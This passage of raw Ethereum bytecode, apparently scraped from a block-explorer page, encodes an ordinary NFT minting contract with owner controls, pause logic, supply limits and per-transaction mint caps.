ffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611ede576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ed59061411f565b60405180910390fd5b80600f8190555050565b600b8054611ef5906144ad565b80601f0160208091040260200160405190810160405280929190818152602001828054611f21906144ad565b8015611f6e5780601f10611f4357610100808354040283529160200191611f6e565b820191906000526020600020905b815481529060010190602001808311611f5157829003601f168201915b505050505081565b60008073a5409ec958c83c3f309868babaca7c86dcb077c190508273ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1663c4552791866040518263ffffffff1660e01b8152600401611fe09190613f9b565b60206040518083038186803b158015611ff857600080fd5b505afa15801561200c573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906120309190613bbf565b73ffffffffffffffffffffffffffffffffffffffff161415612056576001915050612064565b61206084846131ca565b9150505b92915050565b6120726121d1565b73ffffffffffffffffffffffffffffffffffffffff166120906112f9565b73ffffffffffffffffffffffffffffffffffffffff16146120e6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016120dd9061411f565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415612156576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161214d9061405f565b60405180910390fd5b61215f81612e02565b50565b601481565b60007f01ffc9a7000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916149050919050565b600033905090565b6000816121e46122d9565b111580156121f3575060005482105b8015612220575060046000838152602001908152602001600020600001601c9054906101000a900460ff16155b9050919050565b826006600084815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550818373ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560405160405180910390a4505050565b600090565b60006122e982612b73565b90506000816000015173ffffffffffffffffffffffffffffffffffffffff166123106121d1565b73ffffffffffffffffffffffffffffffffffffffff1614806123435750612342826000015161233d6121d1565b611f76565b5b8061238857506123516121d1565b73ffffffffffffffffffffffffffffffffffffffff1661237084610b0f565b73ffffffffffffffffffffffffffffffffffffffff16145b9050806123c1576040517f59c896be00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b8473ffffffffffffffffffffffffffffffffffffffff16826000015173ffffffffffffffffffffffffffffffffffffffff161461242a576040517fa114810000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff161415612491576040517fea553b3400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b61249e858585600161325e565b6124ae6000848460000151612227565b6001600560008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282829054906101000a900467ffffffffffffffff160392506101000a81548167ffffffffffffffff021916908367ffffffffffffffff1602179055506001600560008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282829054906101000a900467ffffffffffffffff160192506101000a81548167ffffffffffffffff021916908367ffffffffffffffff160217905550836004600085815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550426004600085815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff1602179055506000600184019050600073ffffffffffffffffffffffffffffffffffffffff166004600083815260200190815260200160002060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16141561275f5760005481101561275e5782600001516004600083815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555082602001516004600083815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff1602179055505b5b50828473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a46127c88585856001613264565b5050505050565b60006127da82612b73565b90506127ee8160000151600084600161325e565b6127fe6000838360000151612227565b600160056000836000015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282829054906101000a900467ffffffffffffffff160392506101000a81548167ffffffffffffffff021916908367ffffffffffffffff160217905550600160056000836000015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160108282829054906101000a900467ffffffffffffffff160192506101000a81548167ffffffffffffffff021916908367ffffffffffffffff16021790555080600001516004600084815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550426004600084815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff160217905550600160046000848152602001908152602001600020600001601c6101000a81548160ff0219169083151502179055506000600183019050600073ffffffffffffffffffffffffffffffffffffffff166004600083815260200190815260200160002060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161415612aea57600054811015612ae95781600001516004600083815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555081602001516004600083815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff1602179055505b5b5081600073ffffffffffffffffffffffffffffffffffffffff16826000015173ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a4612b5d81600001516000846001613264565b6001600081548092919060010191905055505050565b612b7b6136d0565b600082905080612b896122d9565b11158015612b98575060005481105b15612dcb576000600460008381526020019081526020016000206040518060600160405290816000820160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020016000820160149054906101000a900467ffffffffffffffff1667ffffffffffffffff1667ffffffffffffffff16815260200160008201601c9054906101000a900460ff16151515158152505090508060400151612dc957600073ffffffffffffffffffffffffffffffffffffffff16816000015173ffffffffffffffffffffffffffffffffffffffff1614612cad578092505050612dfd565b5b600115612dc857818060019003925050600460008381526020019081526020016000206040518060600160405290816000820160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020016000820160149054906101000a900467ffffffffffffffff1667ffffffffffffffff1667ffffffffffffffff16815260200160008201601c9054906101000a900460ff1615151515815250509050600073ffffffffffffffffffffffffffffffffffffffff16816000015173ffffffffffffffffffffffffffffffffffffffff1614612dc3578092505050612dfd565b612cae565b5b505b6040517fdf2d9b4200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b919050565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b612ee282826040518060200160405280600081525061326a565b5050565b6000808273ffffffffffffffffffffffffffffffffffffffff163b119050919050565b60008373ffffffffffffffffffffffffffffffffffffffff1663150b7a02612f2f6121d1565b8786866040518563ffffffff1660e01b8152600401612f519493929190613fb6565b602060405180830381600087803b158015612f6b57600080fd5b505af1925050508015612f9c57506040513d601f19601f82011682018060405250810190612f999190613b92565b60015b613016573d8060008114612fcc576040519150601f19603f3d011682016040523d82523d6000602084013e612fd1565b606091505b5060008151141561300e576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b805181602001fd5b63150b7a0260e01b7bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916817bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614915050949350505050565b606060008214156130b1576040518060400160405280600181526020017f300000000000000000000000000000000000000000000000000000000000000081525090506131c5565b600082905060005b600082146130e35780806130cc90614510565b915050600a826130dc9190614326565b91506130b9565b60008167ffffffffffffffff8111156130ff576130fe614646565b5b6040519080825280601f01601f1916602001820160405280156131315781602001600182028036833780820191505090505b5090505b600085146131be5760018261314a91906143b1565b9150600a856131599190614559565b603061316591906142d0565b60f81b81838151811061317b5761317a614617565b5b60200101907effffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916908160001a905350600a856131b79190614326565b9450613135565b8093505050505b919050565b6000600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16905092915050565b50505050565b50505050565b613277838383600161327c565b505050565b600080549050600073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614156132e9576040517f2e07630000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6000841415613324576040517fb562e8dd00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b613331600086838761325e565b83600560008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282829054906101000a900467ffffffffffffffff160192506101000a81548167ffffffffffffffff021916908367ffffffffffffffff16021790555083600560008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160088282829054906101000a900467ffffffffffffffff160192506101000a81548167ffffffffffffffff021916908367ffffffffffffffff160217905550846004600083815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550426004600083815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff1602179055506000819050600085820190508380156134fb57506134fa8773ffffffffffffffffffffffffffffffffffffffff16612ee6565b5b156135c1575b818773ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a46135706000888480600101955088612f09565b6135a6576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b808214156135015782600054146135bc57600080fd5b61362d565b5b818060010192508773ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a4808214156135c2575b8160008190555050506136436000868387613264565b5050505050565b828054613656906144ad565b90600052602060002090601f01602090048101928261367857600085556136bf565b82601f1061369157805160ff19168380011785556136bf565b828001600101855582156136bf579182015b828111156136be5782518255916020019190600101906136a3565b5b5090506136cc9190613713565b5090565b6040518060600160405280600073ffffffffffffffffffffffffffffffffffffffff168152602001600067ffffffffffffffff1681526020016000151581525090565b5b8082111561372c576000816000905550600101613714565b5090565b600061374361373e846141df565b6141ba565b905080838252602082019050828560208602820111156137665761376561467a565b5b60005b85811015613796578161377c8882613917565b845260208401935060208301925050600181019050613769565b5050509392505050565b60006137b36137ae8461420b565b6141ba565b9050828152602081018484840111156137cf576137ce61467f565b5b6137da84828561446b565b509392505050565b60006137f56137f08461423c565b6141ba565b9050828152602081018484840111156138115761381061467f565b5b61381c84828561446b565b509392505050565b6000813590506138338161488b565b92915050565b600082601f83011261384e5761384d614675565b5b813561385e848260208601613730565b91505092915050565b600081359050613876816148a2565b92915050565b60008135905061388b816148b9565b92915050565b6000815190506138a0816148b9565b92915050565b600082601f8301126138bb576138ba614675565b5b81356138cb8482602086016137a0565b91505092915050565b6000815190506138e3816148d0565b92915050565b600082601f8301126138fe576138fd614675565b5b813561390e8482602086016137e2565b91505092915050565b600081359050613926816148e7565b92915050565b60006020828403121561394257613941614689565b5b600061395084828501613824565b91505092915050565b600080604083850312156139705761396f614689565b5b600061397e85828601613824565b925050602061398f85828601613824565b9150509250929050565b6000806000606084860312156139b2576139b1614689565b5b60006139c086828701613824565b93505060206139d186828701613824565b92505060406139e286828701613917565b9150509250925092565b60008060008060808587031215613a0657613a05614689565b5b6000613a1487828801613824565b9450506020613a2587828801613824565b9350506040613a3687828801613917565b925050606085013567ffffffffffffffff811115613a5757613a56614684565b5b613a63878288016138a6565b91505092959194509250565b60008060408385031215613a8657613a85614689565b5b6000613a9485828601613824565b9250506020613aa585828601613867565b9150509250929050565b60008060408385031215613ac657613ac5614689565b5b6000613ad485828601613824565b9250506020613ae585828601613917565b9150509250929050565b600060208284031215613b0557613b04614689565b5b600082013567ffffffffffffffff811115613b2357613b22614684565b5b613b2f84828501613839565b91505092915050565b600060208284031215613b4e57613b4d614689565b5b6000613b5c84828501613867565b91505092915050565b600060208284031215613b7b57613b7a614689565b5b6000613b898482850161387c565b91505092915050565b600060208284031215613ba857613ba7614689565b5b6000613bb684828501613891565b91505092915050565b600060208284031215613bd557613bd4614689565b5b6000613be3848285016138d4565b91505092915050565b600060208284031215613c0257613c01614689565b5b600082013567ffffffffffffffff811115613c2057613c1f614684565b5b613c2c848285016138e9565b91505092915050565b600060208284031215613c4b57613c4a614689565b5b6000613c5984828501613917565b91505092915050565b613c6b816143e5565b82525050565b613c7a816143f7565b82525050565b6000613c8b82614282565b613c958185614298565b9350613ca581856020860161447a565b613cae8161468e565b840191505092915050565b6000613cc48261428d565b613cce81856142b4565b9350613cde81856020860161447a565b613ce78161468e565b840191505092915050565b6000613cfd8261428d565b613d0781856142c5565b9350613d1781856020860161447a565b80840191505092915050565b60008154613d30816144ad565b613d3a81866142c5565b94506001821660008114613d555760018114613d6657613d99565b60ff19831686528186019350613d99565b613d6f8561426d565b60005b83811015613d9157815481890152600182019150602081019050613d72565b838801955050505b50505092915050565b6000613daf6006836142b4565b9150613dba8261469f565b602082019050919050565b6000613dd26026836142b4565b9150613ddd826146c8565b604082019050919050565b6000613df5600a836142b4565b9150613e0082614717565b602082019050919050565b6000613e186016836142b4565b9150613e2382614740565b602082019050919050565b6000613e3b6016836142b4565b9150613e4682614769565b602082019050919050565b6000613e5e6012836142b4565b9150613e6982614792565b602082019050919050565b6000613e816015836142b4565b9150613e8c826147bb565b602082019050919050565b6000613ea46020836142b4565b9150613eaf826147e4565b602082019050919050565b6000613ec76016836142b4565b9150613ed28261480d565b602082019050919050565b6000613eea6000836142a9565b9150613ef582614836565b600082019050919050565b6000613f0d600e836142b4565b9150613f1882614839565b602082019050919050565b6000613f30600c836142b4565b9150613f3b82614862565b602082019050919050565b613f4f81614461565b82525050565b6000613f618286613d23565b9150613f6d8285613cf2565b9150613f798284613d23565b9150819050949350505050565b6000613f9182613edd565b9150819050919050565b6000602082019050613fb06000830184613c62565b92915050565b6000608082019050613fcb6000830187613c62565b613fd86020830186613c62565b613fe56040830185613f46565b8181036060830152613ff78184613c80565b905095945050505050565b60006020820190506140176000830184613c71565b92915050565b600060208201905081810360008301526140378184613cb9565b905092915050565b6000602082019050818103600083015261405881613da2565b9050919050565b6000602082019050818103600083015261407881613dc5565b9050919050565b6000602082019050818103600083015261409881613de8565b9050919050565b600060208201905081810360008301526140b881613e0b565b9050919050565b600060208201905081810360008301526140d881613e2e565b9050919050565b600060208201905081810360008301526140f881613e51565b9050919050565b6000602082019050818103600083015261411881613e74565b9050919050565b6000602082019050818103600083015261413881613e97565b9050919050565b6000602082019050818103600083015261415881613eba565b9050919050565b6000602082019050818103600083015261417881613f00565b9050919050565b6000602082019050818103600083015261419881613f23565b9050919050565b60006020820190506141b46000830184613f46565b92915050565b60006141c46141d5565b90506141d082826144df565b919050565b6000604051905090565b600067ffffffffffffffff8211156141fa576141f9614646565b5b602082029050602081019050919050565b600067ffffffffffffffff82111561422657614225614646565b5b61422f8261468e565b9050602081019050919050565b600067ffffffffffffffff82111561425757614256614646565b5b6142608261468e565b9050602081019050919050565b60008190508160005260206000209050919050565b600081519050919050565b600081519050919050565b600082825260208201905092915050565b600081905092915050565b600082825260208201905092915050565b600081905092915050565b60006142db82614461565b91506142e683614461565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561431b5761431a61458a565b5b828201905092915050565b600061433182614461565b915061433c83614461565b92508261434c5761434b6145b9565b5b828204905092915050565b600061436282614461565b915061436d83614461565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff04831182151516156143a6576143a561458a565b5b828202905092915050565b60006143bc82614461565b91506143c783614461565b9250828210156143da576143d961458a565b5b828203905092915050565b60006143f082614441565b9050919050565b60008115159050919050565b60007fffffffff0000000000000000000000000000000000000000000000000000000082169050919050565b600061443a826143e5565b9050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b82818337600083830152505050565b60005b8381101561449857808201518184015260208101905061447d565b838111156144a7576000848401525b50505050565b600060028204905060018216806144c557607f821691505b602082108114156144d9576144d86145e8565b5b50919050565b6144e88261468e565b810181811067ffffffffffffffff8211171561450757614506614646565b5b80604052505050565b600061451b82614461565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82141561454e5761454d61458a565b5b600182019050919050565b600061456482614461565b915061456f83614461565b92508261457f5761457e6145b9565b5b828206905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b600080fd5b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f5061757365640000000000000000000000000000000000000000000000000000600082015250565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b7f4e6f2030206d696e747300000000000000000000000000000000000000000000600082015250565b7f457863657373206d617820706572207061696420747800000000000000000000600082015250565b7f457863657373206d617820706572206672656520747800000000000000000000600082015250565b7f45786365656473206d617820737570706c790000000000000000000000000000600082015250565b7f546f6b656e20646f6573206e6f742065786973742e0000000000000000000000600082015250565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b7f496e76616c69642066756e64732070726f766964656400000000000000000000600082015250565b50565b7f4661696c656420746f2073656e64000000000000000000000000000000000000600082015250565b7f4e6f20636f6e7472616374730000000000000000000000000000000000000000600082015250565b614894816143e5565b811461489f57600080fd5b50565b6148ab816143f7565b81146148b657600080fd5b50565b6148c281614403565b81146148cd57600080fd5b50565b6148d98161442f565b81146148e457600080fd5b50565b6148f081614461565b81146148fb57600080fd5b5056fea2646970667358221220449dc464182c8e4fa7d9d20857b5f4781d39bdb43e7e0a4335e866b850982a2064736f6c63430008070033697066733a2f2f516d516b4b763839484838744551464b5738343732584462374a6f5141774752584470745758684350754b58344a2f

Deployed Bytecode

0x6080604052600436106102255760003560e01c80638a333b5011610123578063c6682862116100ab578063db4a0f611161006f578063db4a0f61146107be578063e8a3d485146107e7578063e985e9c514610812578063f2fde38b1461084f578063f43a22dc1461087857610225565b8063c6682862146106d9578063c87b56dd14610704578063cd7c032614610741578063ce3f865f1461076c578063d476de1b1461079557610225565b8063a035b1fe116100f2578063a035b1fe14610629578063a0712d6814610654578063a22cb46514610670578063b2a1449b14610699578063b88d4fde146106b057610225565b80638a333b501461057f5780638da5cb5b146105aa578063938e3d7b146105d557806395d89b41146105fe57610225565b806326e987d7116101b15780635c975abb116101755780635c975abb146104985780636352211e146104c35780636c0360eb1461050057806370a082311461052b578063715018a61461056857610225565b806326e987d7146103c75780632aa80807146103f257806342842e0e1461041b578063463fff791461044457806355f804b31461046f57610225565b8063095ea7b3116101f8578063095ea7b3146102f857806318160ddd1461032157806318e223dd1461034c57806323b872dd146103755780632547e2551461039e57610225565b806301ffc9a71461022a57806302329a291461026757806306fdde0314610290578063081812fc146102bb575b600080fd5b34801561023657600080fd5b50610251600480360381019061024c9190613b65565b6108a3565b60405161025e9190614002565b60405180910390f35b34801561027357600080fd5b5061028e60048036038101906102899190613b38565b610985565b005b34801561029c57600080fd5b506102a5610a7d565b6040516102b2919061401d565b60405180910390f35b3480156102c757600080fd5b506102e260048036038101906102dd9190613c35565b610b0f565b6040516102ef9190613f9b565b60405180910390f35b34801561030457600080fd5b5061031f600480360381019061031a9190613aaf565b610b8b565b005b34801561032d57600080fd5b50610336610c96565b604051610343919061419f565b60405180910390f35b34801561035857600080fd5b50610373600480360381019061036e9190613c35565b610cad565b005b34801561038157600080fd5b5061039c60048036038101906103979190613999565b610d92565b005b3480156103aa57600080fd5b506103c560048036038101906103c09190613aef565b610da2565b005b3480156103d357600080fd5b506103dc610ecf565b6040516103e9919061419f565b60405180910390f35b3480156103fe57600080fd5b5061041960048036038101906104149190613bec565b610ed5565b005b34801561042757600080fd5b50610442600480360381019061043d9190613999565b610fca565b005b34801561045057600080fd5b50610459610fea565b604051610466919061419f565b60405180910390f35b34801561047b57600080fd5b5061049660048036038101906104919190613bec565b610fef565b005b3480156104a457600080fd5b506104ad6110e4565b6040516104ba9190614002565b60405180910390f35b3480156104cf57600080fd5b506104ea60048036038101906104e59190613c35565b6110f7565b6040516104f79190613f9b565b60405180910390f35b34801561050c57600080fd5b5061051561110d565b604051610522919061401d565b60405180910390f35b34801561053757600080fd5b50610552600480360381019061054d919061392c565b61119b565b60405161055f919061419f565b60405180910390f35b34801561057457600080fd5b5061057d61126b565b005b34801561058b57600080fd5b506105946112f3565b6040516105a1919061419f565b60405180910390f35b3480156105b657600080fd5b506105bf6112f9565b6040516105cc9190613f9b565b60405180910390f35b3480156105e157600080fd5b506105fc60048036038101906105f79190613bec565b611323565b005b34801561060a57600080fd5b50610613611418565b604051610620919061401d565b60405180910390f35b34801561063557600080fd5b5061063e6114aa565b60405161064b919061419f565b60405180910390f35b61066e60048036038101906106699190613c35565b6114b0565b005b34801561067c57600080fd5b5061069760048036038101906106929190613a6f565b611753565b005b3480156106a557600080fd5b506106ae6118cb565b005b3480156106bc57600080fd5b506106d760048036038101906106d291906139ec565b611a62565b005b3480156106e557600080fd5b506106ee611ade565b6040516106fb919061401d565b60405180910390f35b34801561071057600080fd5b5061072b60048036038101906107269190613c35565b611b6c565b604051610738919061401d565b60405180910390f35b34801561074d57600080fd5b50610756611c17565b6040516107639190613f9b565b60405180910390f35b34801561077857600080fd5b50610793600480360381019061078e9190613c35565b611c2f565b005b3480156107a157600080fd5b506107bc60048036038101906107b79190613c35565b611d1e565b005b3480156107ca57600080fd5b506107e560048036038101906107e09190613c35565b611e03565b005b3480156107f357600080fd5b506107fc611ee8565b604051610809919061401d565b60405180910390f35b34801561081e57600080fd5b5061083960048036038101906108349190613959565b611f76565b6040516108469190614002565b60405180910390f35b34801561085b57600080fd5b506108766004803603810190610871919061392c565b61206a565b005b34801561088457600080fd5b5061088d612162565b60405161089a919061419f565b60405180910390f35b60007f80ac58cd000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916148061096e57507f5b5e139f000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b8061097e575061097d82612167565b5b9050919050565b61098d6121d1565b73ffffffffffffffffffffffffffffffffffffffff166109ab6112f9565b73ffffffffffffffffffffffffffffffffffffffff161480610a2157506109d06121d1565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610a60576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a579061411f565b60405180910390fd5b80601060006101000a81548160ff02191690831515021790555050565b606060028054610a8c906144ad565b80601f0160208091040260200160405190810160405280929190818152602001828054610ab8906144ad565b8015610b055780601f10610ada57610100808354040283529160200191610b05565b820191906000526020600020905b815481529060010190602001808311610ae857829003601f168201915b5050505050905090565b6000610b1a826121d9565b610b50576040517fcf4700e400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6006600083815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b6000610b96826110f7565b90508073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610bfe576040517f943f7b8c00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16610c1d6121d1565b73ffffffffffffffffffffffffffffffffffffffff1614158015610c4f5750610c4d81610c486121d1565b611f76565b155b15610c86576040517fcfb3b94200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b610c91838383612227565b505050565b6000610ca06122d9565b6001546000540303905090565b610cb56121d1565b73ffffffffffffffffffffffffffffffffffffffff16610cd36112f9565b73ffffffffffffffffffffffffffffffffffffffff161480610d495750610cf86121d1565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610d88576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d7f9061411f565b60405180910390fd5b80600e8190555050565b610d9d8383836122de565b505050565b610daa6121d1565b73ffffffffffffffffffffffffffffffffffffffff16610dc86112f9565b73ffffffffffffffffffffffffffffffffffffffff161480610e3e5750610ded6121d1565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610e7d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e749061411f565b60405180910390fd5b60008151905060005b81811015610eca576000838281518110610ea357610ea2614617565b5b60200260200101519050610eb6816127cf565b508080610ec290614510565b915050610e86565b505050565b600d5481565b610edd6121d1565b73ffffffffffffffffffffffffffffffffffffffff16610efb6112f9565b73ffffffffffffffffffffffffffffffffffffffff161480610f715750610f206121d1565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610fb0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fa79061411f565b60405180910390fd5b80600c9080519060200190610fc692919061364a565b5050565b610fe583838360405180602001604052806000815250611a62565b505050565b600381565b610ff76121d1565b73ffffffffffffffffffffffffffffffffffffffff166110156112f9565b73ffffffffffffffffffffffffffffffffffffffff16148061108b575061103a6121d1565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6110ca576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110c19061411f565b60405180910390fd5b80600a90805190602001906110e092919061364a565b5050565b601060009054906101000a900460ff1681565b600061110282612b73565b600001519050919050565b600a805461111a906144ad565b80601f0160208091040260200160405190810160405280929190818152602001828054611146906144ad565b80156111935780601f1061116857610100808354040283529160200191611193565b820191906000526020600020905b81548152906001019060200180831161117657829003601f168201915b505050505081565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611203576040517f8f4eb60400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160009054906101000a900467ffffffffffffffff1667ffffffffffffffff169050919050565b6112736121d1565b73ffffffffffffffffffffffffffffffffffffffff166112916112f9565b73ffffffffffffffffffffffffffffffffffffffff16146112e7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112de9061411f565b60405180910390fd5b6112f16000612e02565b565b600e5481565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b61132b6121d1565b73ffffffffffffffffffffffffffffffffffffffff166113496112f9565b73ffffffffffffffffffffffffffffffffffffffff1614806113bf575061136e6121d1565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6113fe576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113f59061411f565b60405180910390fd5b80600b908051906020019061141492919061364a565b5050565b606060038054611427906144ad565b80601f0160208091040260200160405190810160405280929190818152602001828054611453906144ad565b80156114a05780601f10611475576101008083540402835291602001916114a0565b820191906000526020600020905b81548152906001019060200180831161148357829003601f168201915b5050505050905090565b600f5481565b60006114ba6121d1565b9050601060009054906101000a900460ff161561150c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115039061403f565b60405180910390fd5b81611515610c96565b61151f91906142d0565b600e541015611563576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161155a906140df565b60405180910390fd5b600082116115a6576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161159d9061407f565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff163273ffffffffffffffffffffffffffffffffffffffff1614611614576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161160b9061417f565b60405180910390fd5b8160141015611658576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161164f9061409f565b60405180910390fd5b611660610c96565b600d54106116b15781600310156116ac576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116a3906140bf565b60405180910390fd5b611745565b81601410156116f5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116ec9061409f565b60405180910390f